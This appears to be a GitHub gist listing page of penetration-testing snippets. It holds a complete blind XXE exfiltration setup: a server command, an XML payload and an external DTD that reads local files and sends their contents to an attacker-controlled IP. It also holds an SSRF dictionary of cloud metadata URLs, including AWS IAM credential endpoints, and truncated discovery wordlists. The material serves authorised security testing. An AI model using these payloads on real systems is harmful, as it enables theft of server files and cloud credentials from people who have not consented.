Skip to content

Instantly share code, notes, and snippets.

View scampbell-r7's full-sized avatar

Steve Campbell scampbell-r7

View GitHub Profile
@scampbell-r7
scampbell-r7 / blind_exfil_server.txt
Last active August 2, 2018 15:50
Simple blind XXE exfil server
Start server:
sudo python -m SimpleHTTPServer 80 &> log
In request to vulnerable server:
<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM "http://<your IP address>/ev.xml">%sp;%param1;]><r>&exfil;</r>
On XXE server side in ev.txt:
<!ENTITY % data SYSTEM "file:///FUZZ">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://<your IP address>/?%data;'>">
@scampbell-r7
scampbell-r7 / cloud_metadata.txt
Created August 1, 2018 22:51 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@scampbell-r7
scampbell-r7 / all.txt
Created July 29, 2018 02:26 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@scampbell-r7
scampbell-r7 / content_discovery_all.txt
Last active July 30, 2018 14:43 — forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
AdminLogin
`
~/
~
ים
___
__
_